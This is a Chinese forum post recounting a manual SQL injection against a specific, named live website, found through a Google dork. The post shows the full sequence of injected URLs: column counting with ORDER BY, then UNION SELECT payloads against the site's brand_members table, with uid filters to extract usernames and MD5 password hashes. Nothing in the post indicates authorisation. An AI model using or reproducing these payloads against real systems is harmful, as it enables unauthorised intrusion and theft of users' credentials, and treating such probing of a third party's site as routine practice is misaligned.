设为首页 收藏本站
查看: 957|回复: 0

[经验分享] 记一次php手工注入(mysql)

[复制链接]
累计签到:1 天
连续签到:1 天
发表于 2014-11-14 11:17:44 | 显示全部楼层 |阅读模式
本帖最后由 rwr3211 于 2014-11-14 11:22 编辑

光说不练假把式,关于脚本入侵看的心痒,就实践了一把。

首先google:inurl:"php?id="
发现这个网站可get注入:
http://brand.66wz.com/store.php?id=18

试了下http://brand.66wz.com/store.php?id=18 and user>0
有反应,网页上出现错误提示:
wKiom1RkdxLDtG2sAAQ2-6in8ns361.jpg

然后输入
http://brand.66wz.com/store.php?id=18 and order by 5
报错:
wKioL1Rkd4OR_xkuAASLlyo7E7A799.jpg

根据提示,改为:
http://brand.66wz.com/store.php?id=18 ORDER BY 5 DESC LIMIT 0,20
页面正常:
wKioL1Rkd5Xz8M1oAARIIZNyYAE492.jpg

再将5改为30,错误。
改为20,正常。
······
最后得到的临界值为24
wKioL1Rkd4WjcMsJAARGaaDZeKY972.jpg
wKioL1Rkd4zjzYZdAAQ-mEdwV5Q846.jpg


然后通过火狐的插件得到下面网址:
http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from tables


后面的tables我试了很多单词,如admin什么的,都不行。
本来到这里就该结束了。
后来感觉太可惜了,抱着试一试的心态从网页的源代码取了点关键词百度了一下,发现了跟这个网站很多相关的信息:(http://zhangjianbin.iteye.com/blog/1631387
其中有:
brand_admincp_group 管理组  
brand_admincp_member 管理员  
brand_admincp_perm 管理员权限  
brand_adminsession 管理员与店铺管理员登录次数与信息判断  
brand_members 会员信息

最后连源代码都有了:http://code1.okbase.net/codefile/tool.func.php_2012121116304_79.htm

然后进入:
http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from brand_members
wKiom1Rkdzeid5ynAASfqvZnjvo507.jpg


ok!10可以插入字段。

分别插入username以及password就得到了用户名以及md5加密的密码:

wKiom1RkdzvB9Dm-AASaCFPSP6c089.jpg
wKioL1RkeQCRMDbnAAVEEHz5zSk687.jpg

那么怎么匹配usernamepasseord呢,用穿山甲扫描的时候发现还有一个uid字段:
wKiom1RkemyzteznAAR9YZEG40g648.jpg


所以只要在网址中分别添上"where uid=xxxxx"就行了。
比如说:
http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,username,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from brand_members where uid=555157
wKiom1Rkeu-jQ5OGAASxpWictcM308.jpg
http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from brand_members where uid=555157
wKioL1Rke4-iJrzWAAS8gdT_Pt4382.jpg

再后来,md5解密的时候发现。。。
乌云上已经有这个网站的漏洞了:
http://www.wooyun.org/bugs/wooyun-2010-046524

还真是有够年久了。


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-29397-1-1.html 上篇帖子: windows下php安装 下篇帖子: php 根据key删除数据元素
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表